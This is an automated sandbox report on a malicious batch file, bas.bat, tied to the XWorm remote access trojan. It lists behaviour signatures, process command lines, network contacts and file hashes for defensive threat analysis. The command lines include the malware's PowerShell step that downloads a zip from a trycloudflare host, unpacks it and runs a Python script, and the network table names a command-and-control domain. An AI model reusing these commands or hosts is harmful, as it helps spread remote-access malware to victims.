Analysis Overview
SHA256
ac7ddad9462c9226776b9a2d63fb2eb38a3e1e12a866b40aeabea7e4c7450f84
Threat Level: Known bad
The file bas.bat was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Delays execution with timeout.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-10 13:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 13:16
Reported
2024-06-10 13:21
Platform
win10v2004-20240426-en
Max time kernel
298s
Max time network
301s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4608 created 3500 | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | C:\Windows\Explorer.EXE |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bas.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://stocks-army-malta-false.trycloudflare.com/a.pdf
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff423446f8,0x7fff42344708,0x7fff42344718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://stocks-army-malta-false.trycloudflare.com/qfv0ao.zip' -OutFile 'C:\Users\Admin\Downloads\qfv0ao.zip' }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5264 /prefetch:6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\qfv0ao.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe
python.exe new.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://stocks-army-malta-false.trycloudflare.com/b.pdf
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff423446f8,0x7fff42344708,0x7fff42344718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9386932822711725632,2773561301785936491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stocks-army-malta-false.trycloudflare.com | udp |
| US | 104.16.231.132:443 | stocks-army-malta-false.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| BE | 23.14.90.104:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | stocks-army-malta-false.trycloudflare.com | udp |
| US | 104.16.230.132:443 | stocks-army-malta-false.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | 132.231.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.230.16.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mayfixworm.ddns.net | udp |
| US | 154.127.53.157:7000 | mayfixworm.ddns.net | tcp |
| US | 8.8.8.8:53 | 157.53.127.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mayfixworm.ddns.net | udp |
| US | 154.127.53.157:7000 | mayfixworm.ddns.net | tcp |
Files
memory/548-6-0x00007FFF334F3000-0x00007FFF334F5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f53207a5ca2ef5c7e976cbb3cb26d870 |
| SHA1 | 49a8cc44f53da77bb3dfb36fc7676ed54675db43 |
| SHA256 | 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23 |
| SHA512 | be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499 |
memory/548-7-0x00007FFF334F0000-0x00007FFF33FB1000-memory.dmp
memory/548-8-0x0000014896320000-0x0000014896342000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqnizmf3.1ui.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\pipe\LOCAL\crashpad_712_CLIVCVIOIVUDVQIW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ae54e9db2e89f2c54da8cc0bfcbd26bd |
| SHA1 | a88af6c673609ecbc51a1a60dfbc8577830d2b5d |
| SHA256 | 5009d3c953de63cfd14a7d911156c514e179ff07d2b94382d9caac6040cb72af |
| SHA512 | e3b70e5eb7321b9deca6f6a17424a15b9fd5c4008bd3789bd01099fd13cb2f4a2f37fe4b920fb51c50517745b576c1f94df83efd1a7e75949551163985599998 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 86f72086a5381cb12287f03e3435833c |
| SHA1 | 40670927f23747b67ff2aecf5093e910dc9765f1 |
| SHA256 | d1d3ddfbda12e8ff4329620b5d350f40ce93c5fe2f102ea8681d75105af0f290 |
| SHA512 | f7412effb35d7cf36e74a268d4324fdfcf81596bca320602c34293d15366727f29d21dc7f5456c1af50103b6c9af924bf2eb5bf520bcc9fb5da315e795b56f0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 48d5d3c1bbfd8577a04f4272a74c2805 |
| SHA1 | f323401f3d618f72d8d5e6b03975bd691a18b23f |
| SHA256 | e34610f99915d84028273e9f0cc822efd0a1c8612ecbd27542995908c4512d54 |
| SHA512 | 5caaca7ae6cf3f5eb9f4d5c9c27c11b90a621e77b191a8857f270132891eb5418a64feb6410db9eb431ce1d9bc1c916b9bc7c97bda9540cfe419779b8de23d67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e109f2c24820b0e797e9a2366ec96dc5 |
| SHA1 | 9359f4444d62071c723f929589867dc879cb0e88 |
| SHA256 | e5780a7044c56bcfb19c60c122498db3fde3ec62c566fcc4abd08840b7456129 |
| SHA512 | 1c83c7ed88c19fe0b800957c3c729199ca1529b0af87da1dc2b43d06640acb5faa94c34cb3c6e149e15f85a34f0982822eda2eaea25589c4ce554c0e708f7635 |
memory/548-70-0x00007FFF334F0000-0x00007FFF33FB1000-memory.dmp
memory/548-71-0x00007FFF334F3000-0x00007FFF334F5000-memory.dmp
memory/548-81-0x00007FFF334F0000-0x00007FFF33FB1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 7ac18e782ec33eb67a916fb99648d6bf |
| SHA1 | dc223f4a3721846aa4965d1a00ceb6f344ad9b29 |
| SHA256 | 4b39d0754b9cd7efbbe1d19d372672bbc97acaefc22fbf6b36482aa6ece440c2 |
| SHA512 | 481dd9205823c6397983bf193070237a03d070e82bfc74c863113dbc992476f26329404336ebd8bc9212e55dba042ec5da57d62e4a634490c6f1e58e494a21bf |
memory/548-125-0x00007FFF334F0000-0x00007FFF33FB1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6c4805e00673bef922d51b1a7137028f |
| SHA1 | 0eabb38482d1733dd85a2af9c5342c2cafcd41eb |
| SHA256 | 7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd |
| SHA512 | eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1 |
memory/4564-137-0x000001826D2C0000-0x000001826D2D2000-memory.dmp
memory/4564-138-0x000001826D2B0000-0x000001826D2BA000-memory.dmp
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\django-stubs\django-stubs\contrib\flatpages\urls.pyi
| MD5 | 72baef07657af40bbb9421362b0c67cd |
| SHA1 | e0e802c0e54240712b8bd8418627b2ffa123bc94 |
| SHA256 | a0869d2c9451a944b87f059edc5d93c1d415888b98b9247b8aeb5489d9dcba7d |
| SHA512 | 32e4cddc4df9759ad46f617cd69b2adc130a918cac4f588cf563d8e3c298ece3a5bb0a9dc9a082cbdc015f2789336a6e67d545603ea69477fc5de28256fd6d06 |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\django-stubs\django-stubs\core\mail\backends\filebased.pyi
| MD5 | 7f6526c1bbcb2aa7ba6a8cde268765bc |
| SHA1 | cfc87c1fd110239d47886e0c5ebcad54bd453bbe |
| SHA256 | ae9de027f591acfedc0ba387099c4398c0841a9c126535d313ffbdb18184eea0 |
| SHA512 | 3c6f26b5f0ab2bc22e72e116ffe28624e5d971a86b9d85e5f733844827e784b8349c46fa46ca5390bc972607b7fb5b37a6fb47b410e105f02b147dfe77a737c7 |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\django-stubs\django-stubs\core\management\commands\testserver.pyi
| MD5 | 6b8cad3305cef8186496283d80f5ea37 |
| SHA1 | 418009700ba673f4aebf49db46d1f44384d4f8f8 |
| SHA256 | 1a4fa10dd76be871ebe4f02bc9ccf70eaa1e178efa5291aa6aff471a9fcdb272 |
| SHA512 | e06ba45ea1bd65681f3be4a85118d4bc75c961e82dc6d319c6a2b1a7a39533732fe7c5d152ea978e0dd62c1ea520eb62c9322eaed82ca5588495fa1465f71555 |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\stdlib\2and3\ntpath.pyi
| MD5 | 05fbc4e476029d491dbc02a9522c6e04 |
| SHA1 | 061fe610c5eb467fa554f8dd131c5725c84fe14d |
| SHA256 | 2875c0ab8ecc2fc5d7a6192bc2f35a5161193e747825e1081ef33f9b10a5459c |
| SHA512 | 6afd03793a31a76a0b51da83e6c1037e536025ecfaf1e0a752ce4ca471100e29c2a2ff5c54a0cec07c64653b83fdac9c0d6d78b55c50c685d8452f900896226b |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\third_party\2and3\cryptography\hazmat\__init__.pyi
| MD5 | 84a27291937d76e46b277653002601f2 |
| SHA1 | fe60efb40aeeee2998bb07245d4f9571ad08825f |
| SHA256 | ddf071712a6926be84384714a23bdf946dc47a083b96fd90a7474d41020bacfe |
| SHA512 | e489e83fd33fdc8ba88954725f79c2132bc4162ba713c72b190b790b4a368e3ceb024d7b8bceec4544123a5435fdfd987876f1b2542da06cba899f5ac72945be |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\third_party\3\docutils\parsers\__init__.pyi
| MD5 | ca0671203ef640e39118196d5af0987c |
| SHA1 | 0567568d191018e003ce5866f33ac4725ac30304 |
| SHA256 | 0505540b357c942ca59e62c2b67374633fedb65ab2cdc2dcf81671d8a3d73f33 |
| SHA512 | 322fe9032e26defb6abf33051093924a4fa9beff5a5e619acdd3f0da975fadb81388a50d6e037798a73896762d1ab2ce0e189c4aae2b580988fa4a3229f5712b |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\third_party\3\six\moves\SimpleHTTPServer.pyi
| MD5 | 59c113ba8da07ed8b8cf1d9fa0cb0a08 |
| SHA1 | b29c918fa7f8eb1f29f0a940f7bc3473d1f5d5e1 |
| SHA256 | bed05425469b4eb2152bdec29f43212d48474a56e61c1f10810956c1a747fbac |
| SHA512 | 98a1b860fb715c34568ec9247df52f480fd5fa72eac8c3b34954bfc2b35fb4b0bf73ea421950a9c027a20fc364207bf930edff3033490acf4011098afbe098e1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\site-packages\setuptools-58.1.0.dist-info\INSTALLER
| MD5 | 365c9bfeb7d89244f2ce01c1de44cb85 |
| SHA1 | d7a03141d5d6b1e88b6b59ef08b6681df212c599 |
| SHA256 | ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508 |
| SHA512 | d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\cjkencodings\shift_jis-utf8.txt
| MD5 | cc34bcc252d8014250b2fbc0a7880ead |
| SHA1 | 89a79425e089c311137adcdcf0a11dfa9d8a4e58 |
| SHA256 | a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b |
| SHA512 | c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\test_importlib\builtin\__main__.py
| MD5 | 47878c074f37661118db4f3525b2b6cb |
| SHA1 | 9671e2ef6e3d9fa96e7450bcee03300f8d395533 |
| SHA256 | b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216 |
| SHA512 | 13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\test_importlib\frozen\__init__.py
| MD5 | c3239b95575b0ad63408b8e633f9334d |
| SHA1 | 7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc |
| SHA256 | 6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225 |
| SHA512 | 5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\test_importlib\namespacedata01\binary.file
| MD5 | 37b59afd592725f9305e484a5d7f5168 |
| SHA1 | a02a05b025b928c039cf1ae7e8ee04e7c190c0db |
| SHA256 | 054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8 |
